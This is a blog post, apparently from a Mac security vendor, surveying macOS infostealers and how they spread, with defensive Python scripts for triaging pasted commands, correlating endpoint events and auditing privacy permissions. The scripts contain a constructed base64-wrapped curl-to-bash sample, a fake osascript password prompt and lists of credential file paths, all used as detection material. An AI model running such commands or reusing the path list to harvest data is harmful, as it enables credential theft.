Mac Infostealers in 2026: What They Steal, How They Spread, and How to Stop Them
In the second half of 2024, Palo Alto Networks' Unit 42 team detected a 101% increase in macOS infostealers in just two quarters. By August 2025, Jamf reported that AMOS malware detections alone had spiked 300%. And as of early 2026, Microsoft Defender Experts is tracking active infostealer campaigns targeting macOS users through social engineering, malvertising, and supply chain attacks.
This is not a theoretical risk. There are now over a dozen active infostealer families targeting macOS, up from two or three in 2023. If you use a Mac and you have passwords, crypto wallets, or session cookies stored on it, you are a target.
I built CoreLock because I got tired of security tools that just show you a list of threats with zero context. The Mac threat landscape has changed dramatically even in the last two years. We are seeing more Go and Rust-based malware targeting macOS, more infostealers sold as a service, and more sophisticated social engineering designed specifically to bypass macOS protections. Here is what you need to know.
What is an infostealer?
An infostealer is malware built for one purpose: extract credentials, cookies, crypto wallets, and sensitive files from your machine and send them to an attacker. Unlike ransomware, which locks your files and demands payment, infostealers operate silently. They get in, harvest everything valuable, and get out.
Speed is the defining characteristic. Most Mac infostealers complete their entire data harvest in under 30 seconds. They copy your Keychain database, scrape browser passwords and cookies, locate cryptocurrency wallet extensions, grab SSH keys, and package everything into a ZIP file that gets exfiltrated to a command-and-control server. By the time you notice anything unusual, your data is already gone.
The business model has changed too. Most of these tools are sold as Malware-as-a-Service (MaaS) on Telegram and underground forums. Anyone with a few hundred dollars a month can rent a fully featured infostealer, complete with a dashboard, customer support, and regular updates. The barrier to entry for attacking Mac users has never been lower.
The major Mac infostealers in 2026
Here are the families you should know about. Understanding what is out there helps you recognize the tactics they use.
Atomic Stealer (AMOS)
Atomic Stealer, also known as AMOS, is the most prolific Mac infostealer in operation. First discovered in April 2023, it is sold as MaaS on Telegram and hacker forums. AMOS targets Keychain passwords, browser data from every major Chromium-based browser, cryptocurrency wallet extensions, and files from your Desktop and Documents folders. It can target more than 200 cryptocurrency wallet extensions and credentials from over 15 password managers, including 1Password, LastPass, and Dashlane.
Recent campaigns have gotten creative. In December 2025, Malwarebytes reported attackers using Google Ads to funnel Mac users to poisoned AI chat conversations that delivered AMOS. Kaspersky documented AMOS being distributed through ChatGPT's shared chat feature, hosting malicious installation guides directly on chatgpt.com. Trend Micro found AMOS being delivered through trojanized OpenClaw skills, representing a new supply chain attack vector where attackers manipulate AI agentic workflows into installing the malware.
Banshee Stealer
Banshee Stealer made headlines for a particularly clever evasion technique. Check Point Research discovered that newer variants adopted the same string encryption algorithm that Apple's own XProtect antivirus engine uses to protect its data. By scrambling its strings and only decrypting them during execution, Banshee evaded static detection by most antivirus engines for over two months.
The original Banshee operation was sold for $3,000 per month. In November 2024, its source code was leaked on the XSS forum, which shut down the original operation but made the code freely available to anyone. That is arguably worse. Now anyone can create their own modified variant, and researchers have been tracking derivatives ever since.
Realst
Realst is notable for being written in Rust, making it cross-platform and harder for traditional security tools to analyze. It initially spread through fake blockchain games with names like Brawl Earth, WildWorld, and Dawnland. In 2024, it pivoted to fake meeting applications. Cado Security Labs documented the "Meeten" campaign, where threat actors created fake Web3 companies with AI-generated content and social media profiles to trick targets into downloading malicious meeting apps. The malware appeared under names like Meeten, Meetio, Meetone, Clusee, and Cuesee.
Realst is laser-focused on crypto. It targets Keychain data, Chromium-based browsers, Telegram, and popular cryptocurrency wallets. The fake meeting app delivery method makes it particularly dangerous because the social engineering is personalized and convincing.
Cthulhu Stealer
Cthulhu Stealer was the budget option in the MaaS market, renting for $500 per month starting in late 2023. Written in Go, it disguised itself as legitimate software and targeted both Intel and Apple Silicon Macs. It dumped iCloud Keychain passwords using an open-source tool called Chainbreaker, harvested browser cookies, and exfiltrated Telegram account information.
The Cthulhu Team's operation eventually collapsed. Affiliates accused the operator of scamming them on payments, leading to a permanent ban from their marketplace. But the code is still out there, and the techniques it used live on in other stealer families.
MacSync and Shamos
Two newer families worth watching. MacSync, which emerged in April 2025, comes with a full-featured Go-based agent that goes beyond simple data theft and enables remote command-and-control capabilities. Its latest variants are delivered as code-signed and notarized Swift applications, which means they pass Gatekeeper rather than evade it: a valid Developer ID signature plus notarization is exactly what Gatekeeper checks for, and the protection only kicks in once Apple revokes the certificate and updates XProtect. One campaign distributed it as a fake messaging app installer called "zk-call-messenger."
Shamos, detected by CrowdStrike since June 2025, is a variant of AMOS. It has attempted infections against over 300 environments worldwide. It is distributed through malvertising and fake GitHub repositories using ClickFix-style attacks.
How they get on your Mac
Understanding the delivery mechanisms is half the battle. Here are the primary vectors.
ClickFix attacks
This is the one that concerns me most. Attackers create websites that instruct users to copy and paste commands directly into Terminal. It sounds absurd, but the social engineering is effective. The sites pose as troubleshooting guides, software installers, or verification steps. Microsoft documented ClickFix as one of the most effective delivery mechanisms for macOS infostealers because it sidesteps Gatekeeper, notarization checks, and code signature verification entirely: those checks fire on quarantined app bundles, and a script pulled down with curl and executed by the user's own shell never carries the quarantine attribute. The user is essentially installing the malware themselves. I wrote a detailed breakdown of ClickFix if you want to understand the full mechanics.
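A ClickFix lure usually hides the real command behind a base64 blob so that what the victim sees is meaningless. The script below is an added example written for this article (it is not CoreLock code): it triages a pasted command by matching the shapes these lures rely on and decoding any embedded base64 so that a hidden curl-into-shell shows up. The indicator patterns, the 127.0.0.1 placeholder host and the sample commands are constructed for illustration.

```python
"""Triage a command a web page asked the user to paste into Terminal.

Added example for this article, not CoreLock code: the indicator patterns and the
sample commands are constructed here for illustration.
"""
import base64
import binascii
import re

# Shapes a troubleshooting guide or installer page has no business asking for.
INDICATORS = {
    "remote_script_piped_to_shell": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "encoded_payload_piped_to_shell": re.compile(r"base64\s+(-d|-D|--decode)\s*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "quarantine_removal": re.compile(r"\bxattr\b.*?(-d\s+com\.apple\.quarantine|-[rs]*c[rs]*\b)"),
    "gatekeeper_disabled": re.compile(r"spctl\s+--(master|global)-disable"),
    "password_prompt_via_osascript": re.compile(r"osascript.*with hidden answer", re.S),
    "detached_background_process": re.compile(r"\bnohup\b|\bdisown\b"),
}

# Loose base64 token: long enough that ordinary words and flags do not match.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_embedded_base64(command):
    """Return the text of every base64-looking token that decodes to printable UTF-8."""
    decoded = []
    for token in B64_TOKEN.findall(command):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            decoded.append(text)
    return decoded


def analyze_command(command, depth=0):
    """List the indicators hit, descending up to three levels into base64 payloads.

    Hits found inside a decoded layer are prefixed with 'decoded:' so the caller can
    see that the dangerous part was hidden from the user.
    """
    hits = [name for name, pattern in INDICATORS.items() if pattern.search(command)]
    if depth < 3:
        for payload in decode_embedded_base64(command):
            hits.extend("decoded:" + h for h in analyze_command(payload, depth + 1))
    return hits


# Constructed samples. The ClickFix blob is generated here so it is a true encoding
# of the inner command rather than a hand-typed string; the host is a placeholder.
INNER_COMMAND = "curl -fsSL http://127.0.0.1:8080/install.sh | bash"
SAMPLE_CLICKFIX = 'echo "%s" | base64 -d | bash' % base64.b64encode(INNER_COMMAND.encode()).decode()
SAMPLE_FAKE_PROMPT = (
    "osascript -e 'display dialog \"macOS needs your password to continue\" "
    "default answer \"\" with hidden answer'"
)
SAMPLE_BENIGN = "brew install wget"

if __name__ == "__main__":
    for sample in (SAMPLE_CLICKFIX, SAMPLE_FAKE_PROMPT, SAMPLE_BENIGN):
        print(f"{sample!r}\n  -> {analyze_command(sample) or 'no indicators'}")
```

The benign sample is deliberately a command that contains the word wget: the patterns key on a download piped into a shell, not on the tool name, so a plain package install does not trip them.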
Fake application installers
Attackers use SEO poisoning and Google Ads to make malicious download pages appear in search results for popular software. You search for a legitimate app, click what looks like the official download link, and get a trojanized installer instead. Fake macOS help sites and fake AI tool installers have been particularly common in recent campaigns.
Fake meeting applications
This vector targets professionals, especially in crypto and Web3. You get a message from someone who wants to set up a call. They send you a link to download their "meeting app." The app looks legitimate, has a professional website, and sometimes even has AI-generated social media accounts for the fake company behind it. Once installed, it silently harvests your data.
Trojanized software and supply chain attacks
Cracked software has always been a malware vector, but the supply chain angle is newer. Trend Micro documented AMOS being distributed through malicious OpenClaw skills, and MacSync campaigns have used fake GitHub repositories masquerading as legitimate developer tools.
Malicious browser extensions
Some infostealers arrive as browser extensions that request broad permissions. Once installed, they can read every page you visit, capture form data, and steal session cookies.
What they steal and how fast
According to SentinelOne's research, there are seven primary categories of data that macOS infostealers target.
Keychain passwords. The macOS Keychain is the crown jewel. Infostealers copy your entire login.keychain-db file. This contains Wi-Fi passwords, application passwords, website credentials, certificates, and encryption keys. The file is encrypted under your login password, which is why AMOS prompts victims for that password with a fake system dialog (an osascript "display dialog" with a hidden answer field), then uses it to unlock and extract the contents.
Browser data. Login credentials, autofill data, browsing history, and saved credit card numbers from Chrome, Firefox, Safari, Edge, Arc, Brave, Opera, and Vivaldi.
Session cookies. This is the one people underestimate. Stolen session cookies let attackers skip the login flow, and with it two-factor authentication, entirely. They do not need your password or your 2FA code. They import your session cookie into their browser and they are logged in as you, for as long as that session stays valid. That is why, after a suspected compromise, changing passwords is not enough: you also have to sign out of all sessions (or revoke them from the account's security settings) so the stolen cookies die.
Cryptocurrency wallets. Browser extensions like MetaMask, Phantom, Coinbase Wallet, and hundreds of others. Desktop wallets are also targeted.
SSH keys and API tokens. Developers are high-value targets. Your SSH keys give attackers access to your servers. Your API tokens give them access to cloud services, CI/CD pipelines, and production infrastructure.
Files. Many infostealers grab everything from your Desktop and Documents folders. Notes, PDFs, spreadsheets, anything that might contain sensitive information.
System information. Hardware details, installed software, running processes. This data helps attackers identify high-value targets for follow-up attacks.
The entire process typically takes less than 30 seconds from execution to exfiltration. The data is compressed, encrypted, and sent to a C2 server. Some variants, like MacSync, maintain persistent access for ongoing command and control.
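The sequence just described (a fake password dialog, a Keychain read, a sweep of browser and wallet files, then an outbound connection, all inside half a minute) is what behavioural detection keys on. The script below is an added example written for this article, not CoreLock's detection engine: it correlates a simplified, constructed event stream (process exec, file open, outbound connect, roughly what an Endpoint Security client would deliver) and alerts when one process shows several of those behaviours within a 30-second window. The file paths and the MetaMask extension id are real; the process names, pids and timings are made up.

```python
"""Correlate endpoint events into an infostealer alert.

Added example for this article, not CoreLock code. The event stream is a constructed,
simplified stand-in for Endpoint Security events (process exec, file open, outbound
connect); paths and the MetaMask extension id are real, process names and timings are
made up.
"""
import re
from collections import defaultdict

# Where the harvest happens. Each pattern maps a path to a behaviour category.
SENSITIVE_PATHS = [
    (re.compile(r"/Library/Keychains/login\.keychain-db$"), "keychain"),
    (re.compile(r"/Google/Chrome/[^/]+/(Login Data|Cookies|Web Data)$"), "browser"),
    (re.compile(r"/BraveSoftware/Brave-Browser/[^/]+/(Login Data|Cookies)$"), "browser"),
    (re.compile(r"/Firefox/Profiles/[^/]+/(logins\.json|cookies\.sqlite|key4\.db)$"), "browser"),
    # nkbihfbeogaeaoehlefnkodbefgpgknn is MetaMask's Chrome extension id
    (re.compile(r"/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn/"), "wallet"),
    (re.compile(r"/\.ssh/id_(rsa|ed25519|ecdsa)$"), "ssh"),
]

# Processes expected to touch those files. A real agent keys this on code-signing
# identity, not the process name, since a stealer can call itself anything.
EXPECTED_READERS = {"securityd", "Google Chrome", "Brave Browser", "firefox", "ssh", "ssh-agent"}


def classify(event):
    """Map one event to a behaviour category, or None if it is not interesting."""
    if event["op"] == "exec":
        cmd = event.get("cmd", "")
        if "osascript" in cmd and "with hidden answer" in cmd:
            return "fake_password_prompt"  # the AMOS-style credential dialog
        return None
    if event["op"] == "open":
        for pattern, category in SENSITIVE_PATHS:
            if pattern.search(event["path"]):
                return category
        return None
    if event["op"] == "connect":
        return "outbound"
    return None


def detect(events, window=30.0, min_categories=3):
    """Alert on a process showing >= min_categories distinct behaviours within `window` seconds.

    The 30 s default matches the harvest-to-exfiltration time described above; the
    category threshold keeps a lone Keychain read or a single connection from alerting.
    """
    hits = defaultdict(list)
    for event in sorted(events, key=lambda e: e["t"]):
        category = classify(event)
        if category:
            hits[event["pid"]].append((event["t"], category, event["proc"]))

    alerts = []
    for pid, seq in hits.items():
        proc = seq[0][2]
        if proc in EXPECTED_READERS:
            continue
        for start, _, _ in seq:
            in_window = [h for h in seq if start <= h[0] <= start + window]
            categories = {h[1] for h in in_window}
            if len(categories) >= min_categories:
                alerts.append({"pid": pid, "proc": proc, "behaviours": sorted(categories),
                               "start": start, "end": in_window[-1][0]})
                break  # one alert per process is enough
    return alerts


HOME = "/Users/alice"
CHROME = HOME + "/Library/Application Support/Google/Chrome/Default"
SAMPLE_EVENTS = [  # constructed event stream
    {"t": 0.0, "pid": 501, "proc": "Google Chrome", "op": "open", "path": CHROME + "/Cookies"},
    {"t": 10.0, "pid": 777, "proc": "Meeten", "op": "exec",
     "cmd": "osascript -e 'display dialog \"macOS wants to make changes\" default answer \"\" with hidden answer'"},
    {"t": 12.5, "pid": 777, "proc": "Meeten", "op": "open", "path": HOME + "/Library/Keychains/login.keychain-db"},
    {"t": 13.0, "pid": 777, "proc": "Meeten", "op": "open", "path": CHROME + "/Login Data"},
    {"t": 13.1, "pid": 777, "proc": "Meeten", "op": "open", "path": CHROME + "/Cookies"},
    {"t": 13.4, "pid": 777, "proc": "Meeten", "op": "open",
     "path": CHROME + "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn/000003.log"},
    {"t": 14.0, "pid": 777, "proc": "Meeten", "op": "open", "path": HOME + "/.ssh/id_ed25519"},
    {"t": 18.0, "pid": 777, "proc": "Meeten", "op": "connect", "dst": "203.0.113.10:443"},
    {"t": 40.0, "pid": 900, "proc": "ssh", "op": "open", "path": HOME + "/.ssh/id_ed25519"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The point of requiring several categories is precision: Chrome reads its own cookie database all day and ssh reads your key on every connection, so any one of these events is noise. A process that does all of them in the same few seconds and then talks to the network is the pattern worth waking someone up for.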
How to protect yourself
Here is the practical advice. None of this requires advanced technical knowledge.
Never download software from unofficial sources. If you are searching for an app, go directly to the developer's website or the Mac App Store. Do not trust Google Ads or SEO results for download links. Bookmark the official sites for tools you use regularly.
Never paste Terminal commands from websites you did not go looking for. This is the single most important rule. Developer tools do publish install one-liners, but a page that walks you through pasting a command to "fix" an error, pass a verification step, or install an app is a ClickFix lure, and no troubleshooting site or app installer has a legitimate reason to ask for it. If you do not understand exactly what a command does, or it contains a base64 blob or a curl piped into a shell, close the tab. This is the core of ClickFix attacks and it sidesteps every built-in macOS protection.
Use a hardware wallet for significant crypto. If you hold cryptocurrency worth more than you can afford to lose, move it to a hardware wallet. Browser extension wallets are the number one target for infostealers. A hardware wallet keeps your keys offline and out of reach.
Keep macOS updated. Apple updates XProtect signatures regularly to detect known infostealer variants. Banshee Stealer's XProtect evasion technique was eventually detected once its source code leaked and antivirus engines could study it. Automatic updates ensure you have the latest protections.
Review your permissions regularly. Check which apps have access to your files, your camera, your microphone, and Full Disk Access. Full Disk Access lets an app read the locations macOS otherwise guards, such as Safari's cookies and history, Mail, and Messages, without prompting you; the Keychain database itself is encrypted under your login password, which is why stealers phish for it with a fake dialog instead. Remove permissions from apps you no longer use, and be suspicious of any grant to an app you do not remember approving.
Watch for suspicious processes and network activity. Infostealers create new processes and make outbound network connections to exfiltrate your data. Monitoring for anomalous processes and unexpected network traffic is one of the most reliable detection methods. This is a core part of what CoreLock does: it watches for the behavioral patterns that infostealers exhibit, like sudden Keychain access, rapid file enumeration, or unexpected outbound connections, and alerts you in real time.
Be skeptical of unsolicited meeting invitations. If someone you do not know sends you a link to download a meeting app you have never heard of, that is a red flag. Stick to established platforms. Verify the person's identity through a separate channel before downloading anything.
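The permission review above can be scripted. macOS records privacy grants in the TCC database, and the script below (an added example written for this article, not a CoreLock feature) lists which apps hold the permissions a stealer benefits from most and flags the ones worth a second look: grants to a bare executable path rather than a bundle, and bundle ids you did not put on your own known-good list. It uses the documented access-table columns (service, client, client_type, auth_value; auth_value 2 means allowed on macOS 11 and later). Reading the real databases needs a terminal that itself has Full Disk Access, and the system database, where Full Disk Access grants live, also needs root; for an offline demo it builds a constructed TCC.db with made-up entries.

```python
"""List which apps hold the macOS permissions an infostealer benefits from most.

Added example for this article, not CoreLock code. Uses the TCC access table's
documented columns; auth_value 2 = allowed (macOS 11+ schema). The sample database
built by build_sample_db() is constructed for offline use.
"""
import os
import sqlite3
import tempfile

SYSTEM_TCC = "/Library/Application Support/com.apple.TCC/TCC.db"  # Full Disk Access lives here
USER_TCC = os.path.expanduser("~/Library/Application Support/com.apple.TCC/TCC.db")

WATCHED = {
    "kTCCServiceSystemPolicyAllFiles": "Full Disk Access",
    "kTCCServiceAccessibility": "Accessibility",
    "kTCCServiceScreenCapture": "Screen Recording",
    "kTCCServiceCamera": "Camera",
    "kTCCServiceMicrophone": "Microphone",
    "kTCCServiceSystemPolicyDesktopFolder": "Desktop folder",
    "kTCCServiceSystemPolicyDocumentsFolder": "Documents folder",
    "kTCCServiceSystemPolicyDownloadsFolder": "Downloads folder",
}
AUTH_ALLOWED = 2  # auth_value: 0 denied, 1 unknown, 2 allowed, 3 limited


def granted(db_path):
    """Return [(permission, client, client_is_path)] for allowed entries in the watched services."""
    conn = sqlite3.connect(f"file:{db_path}?mode=ro", uri=True)
    try:
        rows = conn.execute(
            "SELECT service, client, client_type FROM access WHERE auth_value = ?",
            (AUTH_ALLOWED,),
        ).fetchall()
    finally:
        conn.close()
    # client_type 0 = bundle identifier, 1 = absolute path to an executable
    return [(WATCHED[s], c, t == 1) for s, c, t in rows if s in WATCHED]


def needs_review(entries, known_good=frozenset()):
    """Flag grants to bare executables and to bundle ids outside com.apple.* and your known-good set."""
    flagged = []
    for permission, client, is_path in entries:
        if is_path or (client not in known_good and not client.startswith("com.apple.")):
            flagged.append((permission, client))
    return flagged


def build_sample_db():
    """Constructed TCC.db with only the columns this script reads, for an offline demo."""
    path = os.path.join(tempfile.mkdtemp(), "TCC.db")
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, auth_value INTEGER)")
    conn.executemany("INSERT INTO access VALUES (?, ?, ?, ?)", [
        ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, 2),
        ("kTCCServiceSystemPolicyAllFiles", "com.microsoft.VSCode", 0, 2),
        ("kTCCServiceSystemPolicyAllFiles", "/Users/alice/Downloads/Meeten.app/Contents/MacOS/Meeten", 1, 2),
        ("kTCCServiceScreenCapture", "us.zoom.xos", 0, 0),  # denied, so never listed
        ("kTCCServiceCamera", "us.zoom.xos", 0, 2),
    ])
    conn.commit()
    conn.close()
    return path


if __name__ == "__main__":
    known_good = {"com.microsoft.VSCode"}  # your own list of apps you meant to grant
    for db in (SYSTEM_TCC, USER_TCC, build_sample_db()):
        try:
            entries = granted(db)
        except sqlite3.OperationalError as err:
            print(f"{db}: {err} (needs Full Disk Access and, for the system DB, root)")
            continue
        for permission, client in needs_review(entries, known_good):
            print(f"{db}: review {permission} granted to {client}")
```

A Full Disk Access grant to something under ~/Downloads is exactly the shape the Meeten-style fake meeting apps leave behind; Terminal and your editor having it are usually your own doing, which is what the known-good list is for.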
The bigger picture
The reason Mac infostealers are growing so fast is economics. The MaaS model means that anyone can rent a fully featured stealer for a few hundred dollars a month. The macOS user base skews toward professionals, developers, and crypto holders, which means higher-value targets. And the long-standing perception that Macs do not get malware means fewer people are running security tools.
That perception needs to die. In 2026, macOS faces the same class of threats that Windows has dealt with for years, delivered through social engineering that is often more sophisticated than anything we have seen on Windows.
The good news is that most infostealers rely on tricking you into installing them. If you are careful about what you download, skeptical of Terminal commands, and paying attention to what is running on your Mac, you eliminate the vast majority of the risk.
If you want an extra layer of protection, CoreLock monitors for the exact behavioral patterns that infostealers use. It does not just check a signature database. It watches what processes do after they launch, and if something starts harvesting your Keychain, scraping browser data, or making suspicious network connections, you will know about it before the exfiltration completes.
Stay safe out there. If you have questions or think your Mac might already be compromised, check out our guide on how to remove malware from your Mac or the five signs your Mac has been compromised.